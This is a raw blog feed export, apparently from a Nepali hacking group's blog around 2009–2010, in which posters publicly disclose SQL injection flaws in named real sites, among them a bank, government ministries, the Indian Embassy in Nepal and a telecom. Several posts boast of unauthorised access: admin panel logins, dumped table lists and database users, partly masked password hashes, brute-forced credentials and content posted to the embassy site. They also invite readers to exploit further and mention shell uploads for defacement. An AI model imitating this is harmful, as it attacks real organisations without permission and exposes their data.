/&gt;&lt;br /&gt;No other dumps made over here for the reason of security. Hope they will secure it.&lt;br /&gt;Thank you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4527398429941749495?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4527398429941749495/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/ekantipurcom-ekantipur-online-news.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4527398429941749495'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4527398429941749495'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/ekantipurcom-ekantipur-online-news.html' title='Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-911081229145734385</id><published>2010-04-25T18:50:00.000-07:00</published><updated>2010-04-25T18:50:39.830-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='nhnepal.com'/><title type='text'>NHNepal.com New Horizons Computer Learning Centers Vulnerability</title><content type='html'>NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal which is vulnerable to minor injection attack. This vulnerability was reported to us by someone and full credit goes to him/her for finding this.&lt;br /&gt;They state: &lt;br /&gt;With over 300 centers in 70 countries, New Horizons is the &lt;strong&gt;world’s   largest independent IT training company&lt;/strong&gt;. Over the past 25 years, New Horizons has delivered a full range of&amp;nbsp;IT training&amp;nbsp;and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.&lt;br /&gt;&lt;br /&gt;Anyway, logged in admin panel screenshot from the hacker himself:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_RVRW0sa79Nw/S9TxP8AGuWI/AAAAAAAAADI/Qvbukz8pKm8/s1600/nhnepal+sql+injection.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_RVRW0sa79Nw/S9TxP8AGuWI/AAAAAAAAADI/Qvbukz8pKm8/s320/nhnepal+sql+injection.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-911081229145734385?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/911081229145734385/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/nhnepalcom-new-horizons-computer.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/911081229145734385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/911081229145734385'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/nhnepalcom-new-horizons-computer.html' title='NHNepal.com New Horizons Computer Learning Centers Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_RVRW0sa79Nw/S9TxP8AGuWI/AAAAAAAAADI/Qvbukz8pKm8/s72-c/nhnepal+sql+injection.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2882885736661877932</id><published>2010-04-12T13:12:00.000-07:00</published><updated>2010-04-12T13:12:56.817-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='cybersansar.com'/><title type='text'>Cybersansar vulnerability re-exposed</title><content type='html'>One of the most visited sites from Nepal, CyberSansar.com is vulnerable to lots of serious injections like SQLi and XSS but today here I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5 so its easier for the attacker to steal the database information.&lt;br /&gt;&lt;pre id="line1"&gt;User: database =&amp;gt; cybernepal3@localhost:cybernepal_3&lt;/pre&gt;&lt;pre id="line1"&gt;&lt;/pre&gt;&lt;pre id="line1"&gt;Tables:&lt;/pre&gt;&lt;pre id="line1"&gt;album_detail&lt;br /&gt;album_master&lt;br /&gt;album_person_related&lt;br /&gt;art_gallery&lt;br /&gt;art_gallery_image&lt;br /&gt;art_gallery_path&lt;br /&gt;art_grp_tag_gal&lt;br /&gt;art_tag_gallery&lt;br /&gt;art_tag_photo&lt;br /&gt;art_tags&lt;br /&gt;article_person_related&lt;br /&gt;author&lt;br /&gt;bachelor_user_logon&lt;br /&gt;bc_category_para&lt;br /&gt;bc_final_person_profile&lt;br /&gt;bc_person_profile&lt;br /&gt;bc_photo_folder&lt;br /&gt;bc_profile_list&lt;br /&gt;bc_profile_para&lt;br /&gt;contest_master&lt;br /&gt;contest_question_detail&lt;br /&gt;contest_question_master&lt;br /&gt;cs_birthday_wish&lt;br /&gt;discography&lt;br /&gt;ethnicity_para&lt;br /&gt;ev_gallery&lt;br /&gt;ev_gallery_image&lt;br /&gt;ev_gallery_path&lt;br /&gt;ev_grp_tag_gal&lt;br /&gt;ev_person_related&lt;br /&gt;ev_tag_gallery&lt;br /&gt;ev_tag_photo&lt;br /&gt;ev_tags&lt;br /&gt;event_master&lt;br /&gt;event_para_person_related&lt;br /&gt;event_type&lt;br /&gt;gallery&lt;br /&gt;gallery_image&lt;br /&gt;gallery_path&lt;br /&gt;group_list&lt;br /&gt;grp_tag_gal&lt;br /&gt;job&lt;br /&gt;org_para&lt;br /&gt;org_type&lt;br /&gt;person_persontype&lt;br /&gt;person_taghion&lt;br /&gt;photographer&lt;br /&gt;popular_models&lt;br /&gt;pr_category_para&lt;br /&gt;pr_gallery_image&lt;br /&gt;pr_hion&lt;br /&gt;pr_person_detail&lt;br /&gt;pr_person_profile&lt;br /&gt;pr_persontype&lt;br /&gt;pr_persontype_para&lt;br /&gt;pr_photos&lt;br /&gt;pr_profile_list&lt;br /&gt;pr_profile_para&lt;br /&gt;pr_question_related&lt;br /&gt;pr_subcategory_para&lt;br /&gt;pr_users&lt;br /&gt;profile&lt;br /&gt;profile1&lt;br /&gt;profile_persontype&lt;br /&gt;register_users&lt;br /&gt;section&lt;br /&gt;song_genre_related&lt;br /&gt;song_orginal_singer_related&lt;br /&gt;song_person_related&lt;br /&gt;srw_login&lt;br /&gt;srw_news&lt;br /&gt;tag&lt;br /&gt;tag_article&lt;br /&gt;tag_gallery&lt;br /&gt;tag_list&lt;br /&gt;tag_photo&lt;br /&gt;tags&lt;br /&gt;user_logon&lt;br /&gt;users&lt;br /&gt;users_artist&lt;br /&gt;vdb_music_category&lt;br /&gt;vdb_video_info&lt;br /&gt;vdb_video_info_backup&lt;br /&gt;video_feature_singer_related&lt;br /&gt;video_genre_related&lt;br /&gt;video_orginal_singer_related&lt;br /&gt;video_person_related&lt;br /&gt;wallpaper&lt;br /&gt;wallpaper_gallery &lt;/pre&gt;&lt;pre id="line1"&gt;&lt;/pre&gt;&lt;pre id="line1"&gt;I'm lazy to dump each column's data lol. Anyway, its just the message to CS how insecure they are.&lt;/pre&gt;&lt;pre id="line1"&gt;Hope they fix this soon.&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2882885736661877932?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2882885736661877932/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/cybersansar-vulnerability-re-exposed.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2882885736661877932'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2882885736661877932'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/cybersansar-vulnerability-re-exposed.html' title='Cybersansar vulnerability re-exposed'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4087503252894315862</id><published>2010-03-14T06:40:00.000-07:00</published><updated>2010-03-14T06:41:13.591-07:00</updated><title type='text'>NTC Great Hack</title><content type='html'>Hi all of hackers out there.&lt;br /&gt;Can some one tell what the fuck is happening with http://websms.ntc.net/cgi-sys/defaultwebpage.cgi this???&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4087503252894315862?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4087503252894315862/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/03/ntc-great-hack.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4087503252894315862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4087503252894315862'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/03/ntc-great-hack.html' title='NTC Great Hack'/><author><name>Danepali Hacker</name><uri>http://www.blogger.com/profile/12866747289101958230</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-177664616157931428</id><published>2010-03-13T08:14:00.000-08:00</published><updated>2010-03-13T08:14:39.185-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ncell'/><category scheme='http://www.blogger.com/atom/ns#' term='mero mobile'/><category scheme='http://www.blogger.com/atom/ns#' term='meromobile'/><category scheme='http://www.blogger.com/atom/ns#' term='spicenepal.com'/><title type='text'>SpiceNepal.com [mero mobile]  Vulnerability</title><content type='html'>Its been a long time we haven't posted to this blog. Apparently, none of the members seem to be active these days including me. Maybe its because of lots of load works to do and other shits in our life. Anyway, this one is the disclosure of the security of spicenepal.com&lt;br /&gt;I thought to publish it now because spicenepal.com or mero mobile has now turned to NCell already.&lt;br /&gt;&lt;br /&gt;This might not be true at present but it is the data when the attack was done.&lt;br /&gt;&lt;br /&gt;Host info:&lt;br /&gt;Windows&lt;br /&gt;Apache 2.2.12&lt;br /&gt;PHP 5.3.0&lt;br /&gt;MySQL version: 5.1.37&lt;br /&gt;&lt;br /&gt;root: *CD6F0D95CC06845F457474160829CA31EA28A***&lt;br /&gt;eshori: *13CC2012857387DA417378DAE0D32DB4FC729***&lt;br /&gt;Last 3 bits changed for security purpose..&lt;br /&gt;&lt;br /&gt;Tables:&lt;br /&gt;PBXT_STATISTICS&lt;br /&gt;bak_banner&lt;br /&gt;bak_bannerclient&lt;br /&gt;bak_bannertrack&lt;br /&gt;bak_categories&lt;br /&gt;bak_components&lt;br /&gt;bak_contact_details&lt;br /&gt;bak_content&lt;br /&gt;bak_content_frontpage&lt;br /&gt;bak_content_rating&lt;br /&gt;bak_core_acl_aro&lt;br /&gt;bak_core_acl_aro_groups&lt;br /&gt;bak_core_acl_aro_map&lt;br /&gt;bak_core_acl_aro_sections&lt;br /&gt;bak_core_acl_groups_aro_map&lt;br /&gt;bak_core_log_items&lt;br /&gt;bak_core_log_searches&lt;br /&gt;bak_groups&lt;br /&gt;bak_menu&lt;br /&gt;bak_menu_types&lt;br /&gt;bak_messages&lt;br /&gt;bak_messages_cfg&lt;br /&gt;bak_migration_backlinks&lt;br /&gt;bak_modules&lt;br /&gt;bak_modules_menu&lt;br /&gt;bak_newsfeeds&lt;br /&gt;bak_plugins&lt;br /&gt;bak_poll_data&lt;br /&gt;bak_poll_date&lt;br /&gt;bak_poll_menu&lt;br /&gt;bak_polls&lt;br /&gt;bak_prbt&lt;br /&gt;bak_sections&lt;br /&gt;bak_session&lt;br /&gt;bak_stats_agents&lt;br /&gt;bak_templates_menu&lt;br /&gt;bak_users&lt;br /&gt;bak_weblinks&lt;br /&gt;jos_banner&lt;br /&gt;jos_bannerclient&lt;br /&gt;......... and much more. I was just too lazy to exploit it.&lt;br /&gt;Anyway that was the disclosure of spicenepal.com. Have fun.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-177664616157931428?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/177664616157931428/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/03/spicenepalcom-mero-mobile-vulnerability.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/177664616157931428'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/177664616157931428'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/03/spicenepalcom-mero-mobile-vulnerability.html' title='SpiceNepal.com [mero mobile]  Vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-473740567359676396</id><published>2010-01-04T08:04:00.000-08:00</published><updated>2010-01-04T08:26:27.727-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='unsafe upload'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='mofsc.gov.np'/><category scheme='http://www.blogger.com/atom/ns#' term='gov.np'/><category scheme='http://www.blogger.com/atom/ns#' term='government sites'/><title type='text'>Ministry of forests &amp; soil conservation vulnerability</title><content type='html'>As usual, another government site is vulnerable to SQL injection and this time, it can be used to mass own the server. I don't know why these fucking guys do such a poor coding. I just don't know who's kid, me or these guys.&lt;br /&gt;Anyway, the MySQL&gt;5 allows me to take all DB details and entities in it. Also, the admin panel is vulnerable to login bypass due to lack of filtration of the data.&lt;br /&gt;Below is the screenshot of the logged panel:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/S0IWO7g26sI/AAAAAAAAAA0/g16-jCrSwOE/s1600-h/mofsc.gov.np.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 194px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/S0IWO7g26sI/AAAAAAAAAA0/g16-jCrSwOE/s320/mofsc.gov.np.JPG" alt="" id="BLOGGER_PHOTO_ID_5422921347056986818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Thank you and hope they fix it...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-473740567359676396?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/473740567359676396/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/01/ministry-of-forests-soil-conservation.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/473740567359676396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/473740567359676396'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/01/ministry-of-forests-soil-conservation.html' title='Ministry of forests &amp; soil conservation vulnerability'/><author><name>learn3r aka cyb3r lord</name><uri>http://www.blogger.com/profile/08049135959513279608</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_R7J4rokcecI/S0IWO7g26sI/AAAAAAAAAA0/g16-jCrSwOE/s72-c/mofsc.gov.np.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4617801587341271483</id><published>2009-12-26T11:00:00.000-08:00</published><updated>2009-12-26T11:00:19.134-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='nbbl.com.np'/><title type='text'>Nepal Bangladesh Bank SQLi vulnerability</title><content type='html'>The official website of Nepal Bangladesh Bank Limited www.nbbl.com.np suffers from Sql injection and hence can be compromised to get sensitive informations from it. Its 1 a.m midnight already here so I am lazy to post the dumps for now. If I happen to remember it next day, I shall post the dumps. For now, following are some information of the server:&lt;br /&gt;&lt;b&gt;current database:&lt;/b&gt; &lt;strong&gt;nbblcom_db&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;user : &lt;/strong&gt;&lt;strong&gt;nbblcom_admin@localhost&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;DB version: &lt;/strong&gt;&lt;strong&gt;4.1.22-standard &lt;/strong&gt;&lt;br /&gt;I am being too lazy at this time to bruteforce for the tables. Guys do yourself if you want to dig the site more.&lt;br /&gt;&lt;strong&gt;Thanks.&lt;/strong&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;strong&gt; &lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4617801587341271483?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4617801587341271483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/nepal-bangladesh-bank-sqli.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4617801587341271483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4617801587341271483'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/nepal-bangladesh-bank-sqli.html' title='Nepal Bangladesh Bank SQLi vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-5631234911684329586</id><published>2009-12-23T20:33:00.000-08:00</published><updated>2009-12-23T20:50:07.730-08:00</updated><title type='text'>Neoteric Nepal SQL injection Vuln</title><content type='html'>&lt;div&gt;Official website of Neoteric nepal suffers from sql injection vuln.&lt;br /&gt;Some details:&lt;br /&gt;ftp: &lt;a href="ftp://ftp.neoteric.com.np/"&gt;ftp://ftp.neoteric.com.np/&lt;/a&gt;&lt;br /&gt;ftp security: very secure&lt;br /&gt;Vuln:SQL injection&lt;br /&gt;Dump:&lt;br /&gt;Table name: admin_user&lt;br /&gt;id:pwd= not displayed for security&lt;br /&gt;Scrnshot:&lt;/div&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 507px; DISPLAY: block; HEIGHT: 279px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5418660305503921778" border="0" alt="" src="http://1.bp.blogspot.com/_AJFPBbDsJ2M/SzLy1qwSJnI/AAAAAAAAAA4/_gSp4acLPCk/s320/scrn.jpg" /&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Hope they secure it soon&lt;br /&gt;Regards,&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5631234911684329586?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/5631234911684329586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/neoteric-nepal-sql-injection-vuln.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5631234911684329586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/5631234911684329586'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/neoteric-nepal-sql-injection-vuln.html' title='Neoteric Nepal SQL injection Vuln'/><author><name>dARK_pHOENIX</name><uri>http://www.blogger.com/profile/11872711864906408375</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_AJFPBbDsJ2M/SzLy1qwSJnI/AAAAAAAAAA4/_gSp4acLPCk/s72-c/scrn.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-2880386423213156283</id><published>2009-12-23T07:41:00.000-08:00</published><updated>2009-12-23T07:41:44.406-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='nitc.gov.np'/><title type='text'>National Information Technology Center site vulnerability</title><content type='html'>The official website of National Information Technology Center suffers from SQL injection and hence, the login information and other data can be taken away from the database. The worse part is that by uploading shell, one could not only deface nitc.gov.np but also other sites hosted on the server to name few: nepalgov.gov.np, hlcit.gov.np&lt;br /&gt;&lt;br /&gt;Just amazed that the center has got so many computer engineers and they are vulnerable to such a simple hack. They need to learn the sense of security to build secure digitalized nepal. Also, what is the fucking point of putting the files in admin panel folder and letting users download from them. And guys, you need to learn to prevent index browsing (its so open) and also the usage of sessions in PHP...&lt;br /&gt;&lt;br /&gt;Screenshot:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_RVRW0sa79Nw/SzI4lcDT3TI/AAAAAAAAAC0/bWhkz1w-h2U/s1600-h/nitc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_RVRW0sa79Nw/SzI4lcDT3TI/AAAAAAAAAC0/bWhkz1w-h2U/s320/nitc.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Thanks... and absolutely no offense to them. We just want the secure nepal.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2880386423213156283?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/2880386423213156283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/national-information-technology-center.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2880386423213156283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/2880386423213156283'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/national-information-technology-center.html' title='National Information Technology Center site vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_RVRW0sa79Nw/SzI4lcDT3TI/AAAAAAAAAC0/bWhkz1w-h2U/s72-c/nitc.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-6258207959909138224</id><published>2009-12-21T18:29:00.000-08:00</published><updated>2009-12-21T18:35:58.007-08:00</updated><title type='text'>Ketaketi.org(CLFN) SQL Injection vuln</title><content type='html'>The official website of CLFN (Ketaketi.org) suffers from sql injection attack in  bsoftmore.php&lt;br /&gt;A remote attacker can easily get over the site. (Not me actually, i didnt find the login page.) anyway i got the id and passes/ The id and passes are not shown for security here.&lt;br /&gt;Some details:&lt;br /&gt;Site:ketaketi.org&lt;br /&gt;Vuln: SQL injection&lt;br /&gt;Table name: user&lt;br /&gt;Hope they fix it soon&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6258207959909138224?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/6258207959909138224/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ketaketiorgclfn-sql-injection-vuln.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6258207959909138224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/6258207959909138224'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2009/12/ketaketiorgclfn-sql-injection-vuln.html' title='Ketaketi.org(CLFN) SQL Injection vuln'/><author><name>dARK_pHOENIX</name><uri>http://www.blogger.com/profile/11872711864906408375</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4265422271218529909</id><published>2009-12-20T10:22:00.000-08:00</published><updated>2009-12-20T10:22:10.325-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><category scheme='http://www.blogger.com/atom/ns#' term='indianembassy.org.np'/><title type='text'>www.indianembassy.org.np SQLi vulnerability</title><content type='html'>www.indianembassy.org.np is the official website of Indian Embassy in Nepal and the site is vulnerable to common SQL injection vulnerability.&lt;br /&gt;The site uses mysql version 4 so no information_schema. So I just did bruteforcing by coding small script in PHP to find the valid username/password combination but they are pretty guessable. I didn't think of defacing because it is an organization and defacing such organizations totally would be wrong thing but I posted a news in the site.&lt;br /&gt;Below is the screenshot:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sy5qxMhZKVI/AAAAAAAAACk/gu9Q5drVspQ/s1600-h/indianembassy.jpg" imageanchor="1" style="margin-left: 